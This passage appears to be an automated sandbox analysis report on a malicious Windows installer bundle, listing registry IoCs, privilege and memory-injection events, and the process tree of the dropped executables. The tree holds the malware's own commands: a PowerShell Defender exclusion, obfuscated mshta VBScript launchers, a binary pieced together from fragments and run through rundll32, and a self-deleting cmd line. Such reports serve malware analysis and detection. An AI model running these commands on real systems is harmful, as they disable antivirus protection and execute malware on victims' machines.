\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe -
Modifies registry class 5 IoCs
Processes:
description ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ -
Processes:
installer.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Fri10d184202996a0d7f.exepowershell.exeFri10584c049c7f.exepid process 5000 Fri10d184202996a0d7f.exe 5000 Fri10d184202996a0d7f.exe 4548 powershell.exe 4548 powershell.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe 4752 Fri10584c049c7f.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
foldershare.exepid process 3220 8176 foldershare.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
e3pqPskkJwLs8LEChQJEssCE.exe2987.exepid process 1688 e3pqPskkJwLs8LEChQJEssCE.exe 3960 2987.exe -
Suspicious behavior: SetClipboardViewer 6 IoCs
Processes:
1696741.scr3436754.scr3689896.scr4873741.scr2785272.scr3932054.scrpid process 6856 1696741.scr 5244 3436754.scr 1640 3689896.scr 6324 4873741.scr 7516 2785272.scr 5852 3932054.scr -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Fri10720d229511df563.exesfx_123_206.exeFri10b0a06a73706.exepowershell.exetaskkill.exeDownFlSetup110.exe1223505.scrmshta.execmd.exeWerFault.exeICL5tqbRIE9gecc0WfBQzYV0.exedescription pid process Token: SeCreateTokenPrivilege 5148 Fri10720d229511df563.exe Token: SeAssignPrimaryTokenPrivilege 5148 Fri10720d229511df563.exe Token: SeLockMemoryPrivilege 5148 Fri10720d229511df563.exe Token: SeIncreaseQuotaPrivilege 5148 Fri10720d229511df563.exe Token: SeMachineAccountPrivilege 5148 Fri10720d229511df563.exe Token: SeTcbPrivilege 5148 Fri10720d229511df563.exe Token: SeSecurityPrivilege 5148 Fri10720d229511df563.exe Token: SeTakeOwnershipPrivilege 5148 Fri10720d229511df563.exe Token: SeLoadDriverPrivilege 5148 Fri10720d229511df563.exe Token: SeSystemProfilePrivilege 5148 Fri10720d229511df563.exe Token: SeSystemtimePrivilege 5148 Fri10720d229511df563.exe Token: SeProfSingleProcessPrivilege 5148 Fri10720d229511df563.exe Token: SeIncBasePriorityPrivilege 5148 Fri10720d229511df563.exe Token: SeCreatePagefilePrivilege 5148 Fri10720d229511df563.exe Token: SeCreatePermanentPrivilege 5148 Fri10720d229511df563.exe Token: SeBackupPrivilege 5148 Fri10720d229511df563.exe Token: SeRestorePrivilege 5148 Fri10720d229511df563.exe Token: SeShutdownPrivilege 5148 Fri10720d229511df563.exe Token: SeDebugPrivilege 5148 Fri10720d229511df563.exe Token: SeAuditPrivilege 5148 Fri10720d229511df563.exe Token: SeSystemEnvironmentPrivilege 5148 Fri10720d229511df563.exe Token: SeChangeNotifyPrivilege 5148 Fri10720d229511df563.exe Token: SeRemoteShutdownPrivilege 5148 Fri10720d229511df563.exe Token: SeUndockPrivilege 5148 Fri10720d229511df563.exe Token: SeSyncAgentPrivilege 5148 Fri10720d229511df563.exe Token: SeEnableDelegationPrivilege 5148 Fri10720d229511df563.exe Token: SeManageVolumePrivilege 5148 Fri10720d229511df563.exe Token: SeImpersonatePrivilege 5148 Fri10720d229511df563.exe Token: SeCreateGlobalPrivilege 5148 Fri10720d229511df563.exe Token: 31 5148 Fri10720d229511df563.exe Token: 32 5148 Fri10720d229511df563.exe Token: 33 5148 Fri10720d229511df563.exe Token: 34 5148 Fri10720d229511df563.exe Token: 35 5148 Fri10720d229511df563.exe Token: SeDebugPrivilege 4628 sfx_123_206.exe Token: SeDebugPrivilege 3564 Fri10b0a06a73706.exe Token: SeDebugPrivilege 4548 powershell.exe Token: SeDebugPrivilege 5172 taskkill.exe Token: SeDebugPrivilege 3840 DownFlSetup110.exe Token: SeDebugPrivilege 5816 1223505.scr Token: SeIncBasePriorityPrivilege 5732 mshta.exe Token: SeDebugPrivilege 5732 mshta.exe Token: SeLoadDriverPrivilege 5732 mshta.exe Token: SeDebugPrivilege 5692 cmd.exe Token: SeRestorePrivilege 884 WerFault.exe Token: SeBackupPrivilege 884 WerFault.exe Token: SeCreateTokenPrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeAssignPrimaryTokenPrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeLockMemoryPrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeIncreaseQuotaPrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeMachineAccountPrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeTcbPrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeSecurityPrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeTakeOwnershipPrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeLoadDriverPrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeSystemProfilePrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeSystemtimePrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeProfSingleProcessPrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeIncBasePriorityPrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeCreatePagefilePrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeCreatePermanentPrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeBackupPrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeRestorePrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe Token: SeShutdownPrivilege 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
setup_2.tmpultramediaburner.tmpmsedge.exeinstaller.exepid process 4644 setup_2.tmp 7056 ultramediaburner.tmp 5840 msedge.exe 2452 installer.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3220 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4944 wrote to memory of 4152 4944 setup_x86_x64_install.exe setup_installer.exe PID 4944 wrote to memory of 4152 4944 setup_x86_x64_install.exe setup_installer.exe PID 4944 wrote to memory of 4152 4944 setup_x86_x64_install.exe setup_installer.exe PID 4152 wrote to memory of 4164 4152 setup_installer.exe setup_install.exe PID 4152 wrote to memory of 4164 4152 setup_installer.exe setup_install.exe PID 4152 wrote to memory of 4164 4152 setup_installer.exe setup_install.exe PID 4164 wrote to memory of 4964 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 4964 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 4964 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 5028 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 5028 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 5028 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 1688 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 1688 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 1688 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 2088 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 2088 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 2088 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 3836 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 3836 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 3836 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 3864 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 3864 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 3864 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 5032 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 5032 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 5032 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 780 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 780 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 780 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 4984 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 4984 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 4984 4164 setup_install.exe cmd.exe PID 4964 wrote to memory of 4548 4964 cmd.exe powershell.exe PID 4964 wrote to memory of 4548 4964 cmd.exe powershell.exe PID 4964 wrote to memory of 4548 4964 cmd.exe powershell.exe PID 1688 wrote to memory of 4752 1688 cmd.exe Fri10584c049c7f.exe PID 1688 wrote to memory of 4752 1688 cmd.exe Fri10584c049c7f.exe PID 1688 wrote to memory of 4752 1688 cmd.exe Fri10584c049c7f.exe PID 4164 wrote to memory of 2248 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 2248 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 2248 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 716 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 716 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 716 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 1168 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 1168 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 1168 4164 setup_install.exe cmd.exe PID 5028 wrote to memory of 1320 5028 cmd.exe Fri1034cd265b5e0adcd.exe PID 5028 wrote to memory of 1320 5028 cmd.exe Fri1034cd265b5e0adcd.exe PID 5028 wrote to memory of 1320 5028 cmd.exe Fri1034cd265b5e0adcd.exe PID 3836 wrote to memory of 4736 3836 cmd.exe Fri1015b9a4e0b.exe PID 3836 wrote to memory of 4736 3836 cmd.exe Fri1015b9a4e0b.exe PID 3836 wrote to memory of 4736 3836 cmd.exe Fri1015b9a4e0b.exe PID 5032 wrote to memory of 3804 5032 cmd.exe Fri1008c7d6874.exe PID 5032 wrote to memory of 3804 5032 cmd.exe Fri1008c7d6874.exe PID 5032 wrote to memory of 3804 5032 cmd.exe Fri1008c7d6874.exe PID 2088 wrote to memory of 3564 2088 cmd.exe Fri10b0a06a73706.exe PID 2088 wrote to memory of 3564 2088 cmd.exe Fri10b0a06a73706.exe PID 4164 wrote to memory of 4348 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 4348 4164 setup_install.exe cmd.exe PID 4164 wrote to memory of 4348 4164 setup_install.exe cmd.exe PID 780 wrote to memory of 4628 780 cmd.exe Fri103a7805577.exe PID 780 wrote to memory of 4628 780 cmd.exe Fri103a7805577.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1034cd265b5e0adcd.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exeFri1034cd265b5e0adcd.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exe" ) do taskkill -F -Im "%~nXU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"11⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM12⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "Fri1034cd265b5e0adcd.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10584c049c7f.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10584c049c7f.exeFri10584c049c7f.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\Z_V3sMNGsvI7rRpfvw0QMyp6.exe"C:\Users\Admin\Documents\Z_V3sMNGsvI7rRpfvw0QMyp6.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\aZ0YnrKtc10UIUgYsMgrAuZt.exe"C:\Users\Admin\Documents\aZ0YnrKtc10UIUgYsMgrAuZt.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\0l0xrtpnHHTLm65menBbcuXf.exe"C:\Users\Admin\Documents\0l0xrtpnHHTLm65menBbcuXf.exe"6⤵
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\inst002.exe"C:\Program Files (x86)\Company\NewProduct\inst002.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\2285034.scr"C:\Users\Admin\AppData\Roaming\2285034.scr" /S8⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\3436754.scr"C:\Users\Admin\AppData\Roaming\3436754.scr" /S8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\8280124.scr"C:\Users\Admin\AppData\Roaming\8280124.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8926187.scr"C:\Users\Admin\AppData\Roaming\8926187.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5724610.scr"C:\Users\Admin\AppData\Roaming\5724610.scr" /S8⤵
-
C:\Users\Admin\Documents\CYhWK6wGUBr_0KUI2pFoRj1Q.exe"C:\Users\Admin\Documents\CYhWK6wGUBr_0KUI2pFoRj1Q.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\CYhWK6wGUBr_0KUI2pFoRj1Q.exe" & exit7⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\uqqAcKDbb5l4Gg0p81LTojnE.exe"C:\Users\Admin\Documents\uqqAcKDbb5l4Gg0p81LTojnE.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6380 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
